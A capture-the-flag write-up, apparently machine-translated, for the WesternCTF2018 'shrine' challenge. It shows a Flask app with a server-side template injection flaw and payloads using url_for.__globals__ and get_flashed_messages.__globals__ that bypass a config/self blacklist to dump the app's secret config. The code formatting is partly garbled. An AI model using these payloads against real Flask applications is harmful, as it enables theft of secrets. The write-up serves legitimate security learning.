[WesternCTF2018]shrine writeup

[WesternCTF2018]shrine

The direct thinking is Fancy reading global variables

I gave the source code directly at the beginning

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')     //environ Get... In the system FLAG Parameters , write in app.config in 


@app.route('/')     // visit '/' The code is displayed when the path 
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')     // Get rid of ( and )
        blacklist = ['config', 'self']
        return ''.join(['{
    {% set {}=None%}}'.format(c) for c in blacklist]) + s
        // amount to {
    % set config=None%}{
    % set self=None%} + s, First the config and self Set to none, Achieve the purpose of disabling functions 

    return flask.render_template_string(safe_jinja(shrine))     // The vulnerability of template rendering 


if __name__ == '__main__':
    app.run(debug=True)

ps About os.environ：

OS.ENVIRON() Detailed explanation _Muqingluan

python Get some information about the system

windows：

os.environ[‘HOMEPATH’]: Current user home directory .
os.environ[‘TEMP’]: Temporary directory path .
os.environ[PATHEXT’]: Executable file .
os.environ[‘SYSTEMROOT’]: System home directory .
os.environ[‘LOGONSERVER’]: machine name .
os.environ[‘PROMPT’]: Set prompt .

linux：

os.environ[‘USER’]: Current user .
os.environ[‘LC_COLLATE’]: The alphabetical order when sorting the results of path extension .
os.environ[‘SHELL’]: Use shell The type of .
os.environ[‘LAN’]: The language used .
os.environ[‘SSH_AUTH_SOCK’]:ssh Execution path of .

The idea of this problem is to read global variables （ I tried construction ssti Ordered to execute payload, however __subclasses__() When an error , failed

Test it python Of ssti

/shrine/{
   {8*9}}

because ''.join(['{ {% set {}=None%}}'.format(c) for c in blacklist]) + s This paragraph , We can't use it directly config Function to see all app.config Content , We have to take advantage of it python Objects to call disabled function objects .

current_app The value of is currently used app, Can pass current_app View the current app Of config

There are two flask Built in functions , Can cooperate with globals() Function to get global variables current_app（url_for and get_flashed_messages）

flask Unique functions in the framework ：link

url_for()

url_for Based on the router function name passed in , Return the corresponding URL, Always use in templates url_for() You can safely modify the URL, It's no better than a link that worries about rendering errors in the template :

{
    {url_for('home')}}
/

If we define a route URL With parameters , You can pass them in as key parameters url_for(),Flask They will be filled into the final generated URL in :

{
    { url_for('post', post_id=1)}}
/post/1

get_flashed_messages()

This function will return before flask Pass through flask() List of incoming messages ,flash The function is simple , You can put Python The message represented by string is added to a message queue , Reuse get_flashed_message() Function takes them out and consumes ：

{%for message in get_flashed_messages()%}
    {
    {message}}
{%endfor%}

payload：

/shrine/{
   {url_for.__globals__}}
#current_app': <Flask 'app'>

/shrine/{
   {url_for.__globals__['current_app'].config}}
 perhaps 
/shrine/{
   {get_flashed_messages.__globals__['current_app'].config}}

Reference resources wp：
[WesternCTF2018]shrine - Spring bird